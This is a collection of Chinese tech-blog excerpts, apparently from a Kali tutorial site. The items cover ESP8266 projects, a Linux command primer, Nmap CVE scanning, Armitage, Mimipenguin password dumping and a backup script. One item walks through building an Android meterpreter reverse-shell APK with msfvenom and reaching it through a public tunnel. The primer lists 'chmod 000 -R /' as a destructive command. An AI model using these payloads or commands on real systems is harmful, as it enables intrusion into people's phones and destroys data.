+="c0.013-3.44,0-6.881,0.007-10.322C2.674,1.634,2.974,0.955,3.498,0.53z\"/>\n"; ptr +="</svg>\n"; ptr +="</div>\n"; ptr +="<div class=\"side-by-side temperature-text\">室内温度:</div>\n"; ptr +="<div class=\"side-by-side temperature\">"; ptr +=(int)Temperaturestat; ptr +="<span class=\"superscript\">°C</span></div>\n"; ptr +="</div>\n"; ptr +="<div class=\"data\">\n"; ptr +="<div class=\"side-by-side humidity-icon\">\n"; ptr +="<svg version=\"1.1\" id=\"Layer_2\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" x=\"0px\" y=\"0px\"\n\"; width=\"12px\" height=\"17.955px\" viewBox=\"0 0 13 17.955\" enable-background=\"new 0 0 13 17.955\" xml:space=\"preserve\">\n"; ptr +="<path fill=\"#FFFFFF\" d=\"M1.819,6.217C3.139,4.064,6.5,0,6.5,0s3.363,4.064,4.681,6.217c1.793,2.926,2.133,5.05,1.571,7.057\n"; ptr +="c-0.438,1.574-2.264,4.681-6.252,4.681c-3.988,0-5.813-3.107-6.252-4.681C-0.313,11.267,0.026,9.143,1.819,6.217\"></path>\n"; ptr +="</svg>\n"; ptr +="</div>\n"; ptr +="<div class=\"side-by-side humidity-text\">室内湿度:</div>\n"; ptr +="<div class=\"side-by-side humidity\">"; ptr +=(int)Humiditystat; ptr +="<span class=\"superscript\">%</span></div>\n"; ptr +="</div>\n"; //定义温度变量,并且赋值,用于逻辑判断。 int wd = Temperaturestat ; if (wd>=30){ ptr +="<div class=\"wd\">Hi~ 宝贝今天天气贼热,注入防暑哦!</div>\n"; } if (29>=wd&&wd>20){ ptr +="<div class=\"wd1\">Hi~ 宝贝今天天气不错吆,尽情的玩耍吧!</div>\n"; } if (wd<10){ ptr +="<div class=\"side-by-side humidity-text\">Hi~ 宝贝今天天气比较冷,多穿点衣服,小心着凉!</div>\n"; } ptr +="</div>\n"; ptr +="</body>\n"; ptr +="</html>\n"; return ptr; }我在源代码的基础上,添加了温馨提示!当温度为不同的范围,提示不同的问候语。 //定义温度变量,并且赋值,用于逻辑判断。 int wd = Temperaturestat ; if (wd>=30){ ptr +="<div class=\"wd\">Hi~ 宝贝今天天气贼热,注入防暑哦!</div>\n"; } if (29>=wd&&wd>10){ ptr +="<div class=\"wd1\">Hi~ 宝贝今天天气不错吆,尽情的玩耍吧!</div>\n"; } if (wd=<10){ ptr +="<div class=\"side-by-side humidity-text\">Hi~ 宝贝今天天气比较冷,多穿点衣服,小心着凉!</div>\n"; }
  18. ArmitageArmitage是一款基于Java的Metasploit图形界面化的攻击软件,可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方式使用Metasploit难度较高,需要记忆的命令过多,而Armitage完美的解决了这一问题,用户只需要简单的点击菜单,就可以实现对目标主机的安全测试和攻击。Armitage良好的图形展示界面,使得攻击过程更加直观,用户体验更好。因其操作的简单性,尤其适合Metasploit初学者对目标系统进行安全测试和攻击。 启动 启动后如图所示!如果提示错误,请提前开启postgresql 对目标进行扫描对于目标的扫描,我们可以用Nmap或Msf进行扫描! 如图,我们扫描到了局域网内的一些设备 有windows设备,有打印机,有linux设备 这时,我们可以针对一台设备进行扫描。 可以看到,当前设备开启的端口。 开始攻击右键选择Scan,Armitage会调用Metasploit的漏洞扫描模块,定向扫描靶机,寻找存在的漏洞,为下一步确定攻击方法提供参考依据: 成功之后我们会发现设备的图标会发生变化 当然我们也可以用系统给出的各种exp进行攻击!
  19. 前言七牛云上传工具,利用java开发。使用演示 关于配置 项目下载: java七牛云
  20. 题记本篇文章写个徘徊在刚学习kali的小伙伴。本文将从以下几个方面写起,命令篇,神器篇,渗透测试篇,三个方面讲起。若还有哪些方面没有涉及到,大家在下方留言即可,方便我补充!本文作者逍遥子原创作品,如需转载请先联系作者,同意后方可转载。同时你可以加入QQ交流群:(618207388)或者关注微信公众号kali黑客教学或者kali论坛同步更新!何为kali linuxKali 是一个基于 Debian 的 Linux 发行版。它的目标就是为了简单:在一个实用的工具包里尽可能多的包含渗透和审计工具。 Kali Linux is an open source project that is maintained and funded by Offensive Security, a provider of world-class information security training and penetration testing services. kali安装U盘安装虚拟机安装(推荐)物理机安装树莓派(装逼界的上乘设备) kali安装(vm)配置内存2G(最小)硬盘(20-40G)无线网卡(推荐8187)处理器4核 kali 可以安装图形界面,也可以只用命令行界面。这个根据你的实际情况来看,如果你的设备比较高端,建议安装图形界面,如果设备不高端,建议安装命令界面如树莓派建议安装命令界面。不然图形界面会占用很大的资源。需要注意的是,在kali中两种界面是可以相互切换的。 参考文章: kalilinux的图形界面和文本界面的切换 kalilinux的图形界面和文本界面的切换文件修改开机是否图形配置:配置图行界面的文件是 vi /etc/def... 需要注意的是kali的默认用户名为root密码为toor kali命令篇文件操作复制 移动 删除复制文件 cp /root/123.txt /var/www将root目录下的123.txt复制到/var/www目录下。 移动文件 mv /root/123.txt /var/www删除文件 rm 123.txtps:删除文件夹123下的整个文件 rm -rf 123更改路径和创建文件夹查看当前路径 pwd切换目录 cd /var/www创建文件夹 mkdir hacker文本操作查看文件cat 最常用的就是cat命令了,注意,如果文件很大的话,cat命令的输出结果会疯狂在终端上输出,可以多次按ctrl+c终止。 查看文件大小du -h file查看文件内容cat file既然cat有这个问题,针对比较大的文件,我们就可以使用less命令打开某个文件。 类似vim,less可以在输入/后进入查找模式,然后按n(N)向下(上)查找。 有许多操作,都和vim类似,你可以类比看下。 tail 大多数做服务端开发的同学,都了解这么命令。比如,查看nginx的滚动日志。 tail -f access.logtail命令可以静态的查看某个文件的最后n行,与之对应的,head命令查看文件头n行。但head没有滚动功能,就像尾巴是往外长的,不会反着往里长。 tail -n100 access.log head -n100 access.log其他grep grep用来对内容进行过滤,带上--color参数,可以在支持的终端可以打印彩色,参数n则输出具体的行数,用来快速定位。 比如:查看nginx日志中的POST请求。 grep -rn --color POST access.log推荐每次都使用这样的参数。 如果我想要看某个异常前后相关的内容,就可以使用ABC参数。它们是几个单词的缩写,经常被使用。 A after 内容后n行 B before 内容前n行 C count? 内容前后n行 就像是这样: grep -rn --color Exception -A10 -B2 error.log diff diff命令用来比较两个文件是否的差异。当然,在ide中都提供了这个功能,diff只是命令行下的原始折衷。对了,diff和patch还是一些平台源码的打补丁方式,你要是不用,就pass吧。 压缩解压命令为了减小传输文件的大小,一般都开启压缩。linux下常见的压缩文件有tar、bzip2、zip、rar等,7z这种用的相对较少。 tar 使用tar命令压缩或解压bz2 使用bzip2命令操作gz 使用gzip命令操作zip 使用unzip命令解压rar 使用unrar命令解压 最常用的就是.tar.gz文件格式了。其实是经过了tar打包后,再使用gzip压缩。 创建压缩文件tar cvfz archive.tar.gz dir/解压tar xvfz. archive.tar.gz 其他常用命令chownchown 用来改变文件的所属用户和所属组。 chmod 用来改变文件的访问权限。 这两个命令,都和linux的文件权限777有关。 示例:毁灭性的命令 chmod 000 -R /修改a目录的用户和组为 xjj chown -R xjj:xjj a给a.sh文件增加执行权限(这个太常用了) chmod a+x a.shyum 假定你用的是centos,则包管理工具就是yum。如果你的系统没有wget命令,就可以使用如下命令进行安装。 yum install wget -ysystemctl 当然,centos管理后台服务也有一些套路。service命令就是。systemctl兼容了service命令,我们看一下怎么重启mysql服务。 推荐用下面这个。 service mysql restart systemctl restart mysqld 对于普通的进程,就要使用kill命令进行更加详细的控制了。kill命令有很多信号,如果你在用kill -9,你一定想要了解kill -15以及kill -3的区别和用途。 su su用来切换用户。比如你现在是root,想要用xjj用户做一些勾当,就可以使用su切换。 su xjj su - xjj
  21. Mimipenguin beta-2.0A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. alt text DetailsThis version of Mimipenguin sacrifices features and coverage (as opposed to the beta-1.0 py and sh scripts) in favor of speed and efficiency. Beta 2.0 uses hardcoded offsets for known structures in memory along with PTRACE to reliably extract cleartext user passwords from linux desktop environments. 项目地址: 链接
  22. Nmap的一个鲜为人知的部分是NSE,即Nmap Scripting Engine,这是Nmap最强大和最灵活的功能之一。它允许用户编写(和共享)简单脚本,以自动执行各种网络任务。Nmap内置了全面的NSE脚本集合,用户可以轻松使用,但用户也可以使用NSE创建自定义脚本以满足他们的个性化需求。在这里,我将同时展示两个类似的预制NSE脚本,nmap-vulners和vulscan。这两个脚本旨在通过为特定服务(如SSH,RDP,SMB等)生成相关的CVE信息来增强Nmap的版本检测。CVE或Common Vulnerabilities and Exposures是安全研究人员使用的一种方法,可利用数据库对各个漏洞进行编目和引用。 例如,漏洞利用数据库是公开披露漏洞的流行数据库。Exploit-DB使用CVE编制与特定版本的服务(如“SSH v7.2”)相关联的各个漏洞和漏洞。以下是Exploit-DB网站上可能利用的截图…请注意分配给此特定SSH漏洞的CVE编号。 nmap-vulners和vulscan都使用CVE记录来增强Nmap的版本检测。Nmap将识别扫描服务的版本信息。NSE脚本将获取该信息并生成可用于利用该服务的已知CVE,这使得查找漏洞变得更加简单。 下面是不使用NSE脚本的Nmap版本检测示例。Nmap使用版本“OpenSSH 4.3”在端口22上发现了一个SSH服务。 nmap -sV -p22 1##.##.### .#21 Starting Nmap 7.60 ( https://nmap.org ) Nmap scan report for 1##.##.### .#21 Host is up (0.58s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) ```` 这是使用NSE脚本的同一台服务器的示例。我们现在可以看到有更多的信息输出。nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p22 1##.##.### .#21 Starting Nmap 7.60 ( https://nmap.org ) Nmap scan report for 1##.##.### .#21 Host is up (0.54s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:4.3: | CVE-2006-5051 9.3 https://vulners.com/cve/CVE-2006-5051 | CVE-2006-4924 7.8 https://vulners.com/cve/CVE-2006-4924 | CVE-2007-4752 7.5 https://vulners.com/cve/CVE-2007-4752 | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478 | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692 | CVE-2009-2904 6.9 https://vulners.com/cve/CVE-2009-2904 | CVE-2008-4109 5.0 https://vulners.com/cve/CVE-2008-4109 | CVE-2007-2243 5.0 https://vulners.com/cve/CVE-2007-2243 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906 | CVE-2006-5052 5.0 https://vulners.com/cve/CVE-2006-5052 | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107 | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755 | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814 | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000 | CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327 |_ CVE-2008-3259 1.2 https://vulners.com/cve/CVE-2008-3259 | vulscan: scipvuldb.csv: | [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service | [39331] OpenBSD 4.3p2 Audit Log linux_audit_record_event unknown vulnerability | [32512] OpenBSD OpenSSH up to 4.3 unknown vulnerability | [43307] OpenBSD 4.0 unknown vulnerability | [41835] OpenBSD up to 4.8 unknown vulnerability | [38743] OpenBSD up to 4.6 unknown vulnerability | [36382] OpenBSD OpenSSH up to 4.6 information disclosure | [32699] OpenBSD OpenSSH 4.1 denial of service | [2667] OpenBSD OpenSSH 4.4 Separation Monitor Designfehler | [2578] OpenBSD OpenSSH up to 4.4 Singal race condition | [32532] OpenBSD OpenSSH 4.5 packet.c denial of service | [1999] OpenBSD OpenSSH up to 4.2pl scp system() Designfehler | [1724] OpenBSD OpenSSH 4.0 GSSAPIDelegateCredentials Designfehler | [1723] OpenBSD OpenSSH 4.0 Dynamic Port Forwarding Designfehler | [26219] OpenBSD OpenSSH up to 4.1 pl information disclosure | [16020] OpenBSD OpenSSH 4.5 Format String `nmap-vulners NSE`脚本报告了过去几年披露的十几个CVE。nmap-vulners CVE按严重程度组织,“9.3”是最严重的,位于列表的顶部,因此值得研究。vulscan NSE脚本(在所有CVE之后)还报告了与OpenSSH v4.3相关的十几个有趣的漏洞。 这两个NSE脚本都能很好地显示与易受攻击的服务相关的有用信息。每次我们使用NSE脚本时,Nmap-vulners都会查询Vulners exploit数据库。另一方面,Vulscan查询我们计算机上的本地数据库,该数据库是我们第一次下载vulscan时预先配置的。 #步骤一 ##安装:Nmap-Vulners 要安装nmap-vulners脚本,我们首先使用cd来更改为Nmap脚本目录。cd /usr/share/nmap/scripts/ 然后,通过在终端中键入以下命令来克隆nmap-vulners GitHub存储库。这就是安装nmap-vulners的原因。安装后绝对不需要配置。git clone https://github.com/vulnersCom/nmap-vulners.git #步骤二 ##安装:Vulscan 要安装vulscan,我们还需要将GitHub存储库克隆到Nmap脚本目录中。使用以下命令以执行此操作。git clone https://github.com/scipag/vulscan.git 如前所述,vulscan使用本地存储在我们计算机上的预配置数据库。我们可以在vulscan目录的根目录中查看这些数据库。运行以下ls命令列出可用的数据库。ls vulscan/*.csv vulscan/cve.csv vulscan/exploitdb.csv vulscan/openvas.csv vulscan/osvdb.csv vulscan/scipvuldb.csv vulscan/securityfocus.csv vulscan/securitytracker.csv vulscan/xforce.csv ### Vulscan支持许多优秀的漏洞利用数据库:scipvuldb.csv cve.csv osvdb.csv securityfocus.csv securitytracker.csv xforce.csv expliotdb.csv openvas.csv 为确保数据库完全是最新的,我们可以使用vulscan / utilities / updater /目录中的updateFiles.sh脚本。通过在终端中键入以下命令,切换到updater目录。cd vulscan/utilities/updater/ 然后,使用以下chmod命令确保该文件具有在您的计算机上执行的适当权限。chmod +x updateFiles.sh 然后我们可以通过在我们的终端中输入以下命令来执行和运行脚本。./updateFiles.sh 完成后,我们现在可以开始使用NSE脚本了。 #步骤三 ##使用Nmap-Vulners进行扫描 使用NSE脚本很简单。我们所要做的就是将–script参数添加到我们的Nmap命令中,并告诉Nmap使用哪个NSE脚本。要使用nmap-vulners脚本,我们将使用以下命令。当然,将#after -p更改为扫描端口,将以下#s更改为您正在使用的IP地址。nmap --script nmap-vulners -sV -p### #.### .### .### 该-sV是绝对必要的。使用-sV,我们告诉Nmap探测版本信息的目标地址。如果Nmap不生成版本信息,则nmap-vulners将没有任何数据来查询Vulners数据库。使用这些NSE脚本时始终使用-sV。nmap --script nmap-vulners -sV -p80 1##.##.### .#24 以下是其中一个正在使用的示例:nmap --script vulscan --script-args vulscandb=exploitdb.csv -sV -p22 1##.##.### .#43 Starting Nmap 7.60 ( https://nmap.org ) Nmap scan report for 1##.##.### .#43 Host is up (0.52s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | vulscan: exploitdb.csv: | [2444] OpenSSH <= 4.3 pl (Duplicated Block) Remote Denital of Service Exploit | [21402] OpenSSH s.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability | [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit 作为VulDB的首席架构师,vulscan开发人员通常会花时间更新scipvuldb.csv数据库文件。使用vulscan NSE脚本时,查询该数据库可能会产生最佳结果。 #步骤五 合并为一个命令 作为安全扫描程序,NSE脚本显着提高了Nmap的多功能性,范围和足智多谋。为了充分利用Nmap的版本扫描,我们可以在一个命令中同时使用nmap-vulners和vulscan。要执行此操作,请在终端中键入以下命令。nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p### #.### .### .###
  23. 配置外网环境我这里用的是http://www.ngrok.cc其他的自行试用 这个可以免费 。 远程端口随便填(反正你填啥都会提示你端口已被使用:)) 本地端口填写你的kali ip地址 也就是攻击机的地址 端口随意 不懂4444即可! 填写完后效果如下: 然后点击开通 下载客户端根据你kali的版本下载 我的是64位的。 运行客户端先看看你的clientid 在隧道管理——隧道ip中查看,如图: 记录好id后,运行下面命令 ./sunny clientid 你的id 查看外网的ip我们ping下赠送域名的ip地址 得到ip地址 制作外网shellmsfvenom -p android/meterpreter/reverse_tcp LHOST=外网ip LPORT=外网端口 R > 666.apk**ps:**外网ip就是刚才ping出来的域名的ip地址,外网端口,就是你在添加隧道的时候,设置的端口。 生成之后,配置msf msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 内网ip set LPORT 内网端口 exploit填坑: 生成木马的时候,用的是外网ip和端口。配置msf的时候,我们用内网的ip和端口(很重要) 完成后,手机连接4G网络,运行木马。成功得到shell 看看手机的ip地址 [dplayer url="http://js.bbskali.cn/ji.flv" pic="http://xxx.com/xxx.jpg" autoplay="true" addition="https://api.prprpr.me/dplayer/v3/bilibili?aid=55868962"/]
  24. 活生生的硬是把十几块钱的板子,变成了路由器。清单esp8266板子一个软件ESP8266Flasher 说明:先下载刷入的固件 esp8266 wifi中继固件 固件中0x00000.bin烧写到0x00000地址处,0x10000.bin文件烧写到0x10000地址处。 如图所示: 刷入完成后,会出现MYAP的ssid 连接后访问 192.168.4.1 进行配置 网速测试 优点和缺点 优点: 小巧方便,简单实用,最主要的是便宜哈~ 缺点: 效率低,容易掉线,网速慢。
  25. 之前有说过Linux VPS每日自动备份FTP及数据库通过邮箱发送方法,不过需要自建FTP空间才行,较本教程有点麻烦,如果你没有FTP空间,可以申请一个七牛云存储,免费10G空间备份一般的小站足够了。这里介绍一个备份网站文件和数据库到七牛的脚本,实测效果还不错,Linux vps下弄个定时任务就可以每天定时自动备份了。本脚本Github项目地址:https://github.com/ccbikai/backuptoqiniu 先去注册个七牛云账号,然后实名认证后,会送10G流量和空间。注册完后,在左侧位置找到对象存储,然后新建存储空间,并记住你新建的存储空间的名称,后面需要用到。 方法注意:系统python版本得在2.7以上 1、安装zipapt-get install zip注意:centos命令为 yum install zip2、安装备份脚本wget --no-check-certificate -O backuptoqiniu.zip https://www.moerats.com/usr/down/backuptoqiniu.zip unzip backuptoqiniu.zip && cd backuptoqiniu python setup.py install3、编辑配置文件使用vi backuptoqiniu.sh命令或者Winscp工具编辑 ##备份配置信息 ## #备份名称,用于标记 BACKUP_NAME="backup" #备份目录,多个请空格分隔 BACKUP_SRC="/home/wwwroot/moerats.com" #Mysql主机地址 MYSQL_SERVER="localhost" #Mysql用户名 MYSQL_USER="root" #Mysql密码 MYSQL_PASS="mysqlpassword" #Mysql备份数据库,多个请空格分隔 MYSQL_DBS="dbname" #备份文件临时存放目录,一般不需要更改 BACKUP_DIR="/tmp/backuptoqiniu" #备份文件压缩密码确保压缩包的安全 BACKUP_FILE_PASSWD="123456" ##备份配置信息 End ## ##七牛配置信息 ## #存放空间对应我们在七牛上创建的文件夹 QINIU_BUCKET="Rats" QINIU_ACCESS_KEY="ACCESS_KEY" QINIU_SECRET_KEY="SECRET_KEY" ##七牛配置信息 End ##上面的脚本配置基本都已经写的很清楚了,上半部分填写网站的信息,最后三行的信息在七牛获取。QINIU_BUCKET就是存储空间名,ACCESS_KEY和SECRET_KEY在个人面板-密钥管理里获取。那个AK和SK后面对应的长串就是密钥了。 4、测试脚本chmod +x backuptoqiniu.sh ./backuptoqiniu.sh正常运行后我们可以去七牛的后台你新建的存储空间里查看有没有这个压缩包。 5、设置自动运行脚本crontab -e 0 2 * * 0 /bin/ /root/backuptoqiniu/backuptoqiniu.sh #添加这个脚本上面脚本的意思就是利用crontab定时任务每天凌晨2点自动运行这个脚本。具体crontab的用法可参考文件。 Linux系统Crontab的安装及定时任务的命令详解 说明:很多时候我们的VPS运行脚本或者重启某些软件的时候都需要用到定时功能,这时候就要用到Crontab定时软件了... 注意:如果你用的是国外的vps,可能还需要cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime一下设置成国内时间。 然后service cron restart一下开始你的定时任务。 效果如下 可在七牛云中查看备份的文件